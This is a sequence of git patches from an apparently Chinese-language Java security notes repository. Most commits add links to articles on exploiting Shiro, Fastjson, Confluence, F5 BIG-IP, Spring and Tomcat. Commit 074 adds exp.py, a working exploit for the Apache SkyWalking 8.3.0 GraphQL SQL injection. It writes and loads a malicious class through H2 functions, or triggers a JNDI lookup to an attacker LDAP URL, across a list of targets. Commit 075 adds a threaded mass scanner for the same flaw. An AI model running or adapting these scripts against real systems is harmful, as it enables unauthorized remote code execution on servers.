<63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Jun 2022 00:46:16 +0800 Subject: [PATCH 070/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5f745e5..1639ea4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -133,3 +133,4 @@ + 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** + 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** ++ 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) From 4c2010f3ddf84be130f6727b3c87eca36d09db35 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Jun 2022 10:56:53 +0800 Subject: [PATCH 071/332] Update Readme.md --- Confluence/Readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Confluence/Readme.md b/Confluence/Readme.md index b3e5090..ce8e338 100644 --- a/Confluence/Readme.md +++ b/Confluence/Readme.md @@ -10,3 +10,4 @@ ## 漏洞分析 + [Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析](https://xz.aliyun.com/t/10736) ++ [【下篇】CVE-2022-26134 Confluence 多种通用型绕过沙箱姿势可实现命令回显](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490397&idx=1&sn=f5a7394b80f4ba690e967cb5daf8c9e0&chksm=cefda249f98a2b5f6ec4970dde26392bf43b037ae9fbe9241141aaaa5185958c484dc8522403&mpshare=1&scene=23&srcid=0606Xdmz2f953rcByqNR2SFV&sharer_sharetime=1654481651804&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 4870417220acff50208f70f750e716199804990b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Jun 2022 12:08:23 +0800 Subject: [PATCH 072/332] Update Readme.md --- F5 big/Readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 5550bdd..cfc206f 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -25,3 +25,4 @@ Content-Length: 45 } ``` + [CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现](https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw) ++ [CVE-2022-1388:扩展攻击之文件写入](https://mp.weixin.qq.com/s?__biz=MzkwMzM2NDE5OQ==&mid=2247483731&idx=1&sn=6ac2832719258adbbcf718984558d2cb&chksm=c0962a5bf7e1a34daeb3cfbd92b3de27718aa372374b022e5d7f0ab0923e585012d7be7c429d&scene=132#wechat_redirect) **写入的地址/usr/local/www/** From dff147e25bd327ca4dcc0c22e41df46fe9f9e1cd Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Jun 2022 22:13:45 +0800 Subject: [PATCH 073/332] Create Readme.md --- SkyWalking/Readme.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 SkyWalking/Readme.md diff --git a/SkyWalking/Readme.md b/SkyWalking/Readme.md new file mode 100644 index 0000000..8ad9aa3 --- /dev/null +++ b/SkyWalking/Readme.md @@ -0,0 +1,12 @@ +# SkyWalking + + + +> Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 + +## sql->RCE + +https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw + +https://github.com/vulhub/vulhub/blob/master/skywalking/8.3.0-sqli/README.zh-cn.md + From 956482234e1a30d357f58f42d07a4bdd3d9011e9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Jun 2022 22:15:25 +0800 Subject: [PATCH 074/332] Create exp.py --- SkyWalking/tool/exp.py | 62 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 SkyWalking/tool/exp.py diff --git a/SkyWalking/tool/exp.py b/SkyWalking/tool/exp.py new file mode 100644 index 0000000..a5a2272 --- /dev/null +++ b/SkyWalking/tool/exp.py @@ -0,0 +1,62 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky + +# https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw +# https://cloud.tencent.com/developer/article/1939867 + +import requests +import urllib3 + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + +burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", + "Origin": "http://192.168.18.240:8080", "Connection": "close", + "Referer": "http://192.168.18.240:8080/log"} + +payload = 'CAFEBABE000000.............' +ClassName = 'Evil' +JndiUrl = 'ldap://0.0.0.0:8888' + + +def exp(burp0_url): + burp0_json1 = {"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select file_write('"+payload+"','"+ClassName+".class'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json1, verify=False, allow_redirects=False, timeout=2) + except: + pass + # 触发 + burp0_json2={"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','"+ClassName+"','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def jndi(burp0_url): + burp0_json = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", + "variables": {"condition": {"endpointId": "1", + "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','javax.naming.InitialContext','"+JndiUrl+"','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", + "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", + "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def fileTarget(file): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + jndi(url+'/graphql') + + +if __name__ == '__main__': + fileTarget('vulip.txt') From 5f18a445c466da179edad54c0eb51077bf0e44df Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Jun 2022 22:15:52 +0800 Subject: [PATCH 075/332] Create scan.py --- SkyWalking/tool/scan.py | 104 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 SkyWalking/tool/scan.py diff --git a/SkyWalking/tool/scan.py b/SkyWalking/tool/scan.py new file mode 100644 index 0000000..77d860b --- /dev/null +++ b/SkyWalking/tool/scan.py @@ -0,0 +1,104 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import threading +import requests +import urllib3 + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 + +result = [] # 结果 + +info = 'Apache Skywalking 8.3.0 SQL Injection Vulnerability' + + +# 添加 +endpoints = [ + '/graphql', +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/json', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + 'http': '127.0.0.1:8080' +} + + +def save(result): + file = open('result.txt', 'w') + for line in result: + file.write(line + '\n') + file.close() + + +def Scan_http(url, socket_proxies): + FLAG = False + payload = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n queryLogs(condition: $condition) {\r\n total\r\n logs {\r\n serviceId\r\n serviceName\r\n isError\r\n content\r\n }\r\n }\r\n}\r\n", + "variables": {"condition": {"metricName": "sqli", "paging": {"pageSize": 10}, "state": "ALL"}}} + + for endpoint in endpoints: + try: + res = requests.post(url+endpoint, json=payload, headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if "sqli" in res.text and res.status_code == 200: + FLAG=True + result.append(url+' 存在'+info) + print(url+'\033[1;31m存在'+info+'\033[0m') + break + except: + pass + if not FLAG: + print(url+"扫描完成不存在漏洞") + + +def fileTarget(file, socket_proxies): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + Scan_http(url, socket_proxies) + save(result) + + +def multiRun(file, socket_proxies): + t = threading.Thread(target=fileTarget, args=(file, socket_proxies)) + t.start() + t.join() + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description=info+'scanner') + parser.add_argument('-f', default=None, help='read target url from file') + parser.add_argument('-u', default=None, help='target url') + parser.add_argument('-proxy', default=None, help='-proxy socks5://0.0.0.0:8088') + args = parser.parse_args() + socket_proxies = None + if args.proxy: + socket_proxies = { + 'http': args.proxy + } + if args.u: + Scan_http(args.u, socket_proxies) + exit(0) + if args.f: + multiRun(args.f, socket_proxies) + exit(0) + else: + parser.print_help() + exit(0) From bafaa63dcc47e2e2bae562eb6d8982b70e0efc3a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Jun 2022 11:00:08 +0800 Subject: [PATCH 076/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1639ea4..486304a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -134,3 +134,4 @@ + 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) ++ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** From e7f45d6c353408c289bb56cf3d797671e13e524f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Jun 2022 11:16:08 +0800 Subject: [PATCH 077/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 486304a..94af294 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -135,3 +135,4 @@ + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** ++ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** From 9f89c57ca7a377204b5b736b4c6303498e1c2f1a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 18 Jun 2022 23:10:07 +0800 Subject: [PATCH 078/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 94af294..b8f6a30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -136,3 +136,4 @@ + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** ++ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** From 3b199f945fb869f8cb3e7df63ea176b660697c4a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 22 Jun 2022 17:27:24 +0800 Subject: [PATCH 079/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8f6a30..e06ff9a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -137,3 +137,4 @@ + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** ++ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) From fd59cc19dcba105a9124ece08537db56131669b5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 10:14:40 +0800 Subject: [PATCH 080/332] Update Readme.md --- "java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index d69975f..722fd77 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -2,6 +2,7 @@ >https://github.com/lufeirider/BypassShell/blob/master/JAVA/JAVA.md +>https://gosecure.github.io/template-injection-workshop/#0 + [FreeMarker模板注入](FreeMarker) 后缀名.ftl From 83bf9845180d808bcd8fc77b2e57169d66f014e1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 12:58:08 +0800 Subject: [PATCH 081/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e06ff9a..f55dbba 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -138,3 +138,4 @@ + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) ++ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** From 122d66a5e11cfd65e3746928fdc6b60d57d774e7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 13:12:45 +0800 Subject: [PATCH 082/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f55dbba..a778fc9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -139,3 +139,4 @@ + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** ++ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** From 19f099d56bd1f458e15a6177638cfb8677a09011 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:02:51 +0800 Subject: [PATCH 083/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a778fc9..176579a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -140,3 +140,4 @@ + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** ++ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** From f65caaf7b8980cac7f91d764ebd37ac0de0397b1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:30:37 +0800 Subject: [PATCH 084/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 176579a..7707a95 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -141,3 +141,4 @@ + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** ++ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** From 57e516fe9bfaf3b6741fe68f6e936fb8b4a8f4e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:44:18 +0800 Subject: [PATCH 085/332] Update Readme.md --- SnakeYaml/Readme.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index ec4c550..cf6bec6 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -1,7 +1,9 @@ # snakeyaml ## 不出网利用 ->通过fastjson写文件如何本地加载rce +>通过写文件然后本地加载rce + +//todo 写一个工具 去完成 https://xz.aliyun.com/t/10655 From 7b70f617cbdd71ebd25336b2cdeb6d1b22c736ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Jun 2022 22:28:08 +0800 Subject: [PATCH 086/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7707a95..8fae1f4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -142,3 +142,4 @@ + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** ++ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** From 8b296e1c18e4399452d2dc598206df74779402dc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Jun 2022 23:12:36 +0800 Subject: [PATCH 087/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8fae1f4..a159900 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -143,3 +143,4 @@ + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** ++ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** From 12bfda258a9263bc6405c25f850297639ef3771b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 29 Jun 2022 08:53:45 +0800 Subject: [PATCH 088/332] Update Readme.md --- .../Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" index 90be438..6073000 100644 --- "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" +++ "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" @@ -155,7 +155,10 @@ pom.xml 中版本修改为 1.7.0 或及以下即可 /admin/%20 ``` +## CVE-2022-32532 +[CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532) +原理参考[CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) >参考: > From 0375cf9efffa189c8c02f2057f4d31bb3cb497dc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 30 Jun 2022 09:57:35 +0800 Subject: [PATCH 089/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a159900..b8c200b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -47,7 +47,7 @@ + 2021/10/26 [Hessian 原理分析](https://www.cnblogs.com/shangxiaofei/p/4222170.html) 大概就是以二进制数组传输的rpc,存在反序列化问题。 + 2021/10/26 [XXL-JOB Hessian2反序列化漏洞](https://www.mi1k7ea.com/2021/04/22/XXL-JOB-Hessian2%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/) + 2021/10/30 [Mojarra JSF ViewState 反序列化漏洞](https://blog.csdn.net/xuandao_ahfengren/article/details/113135364) -+ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** ++ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) 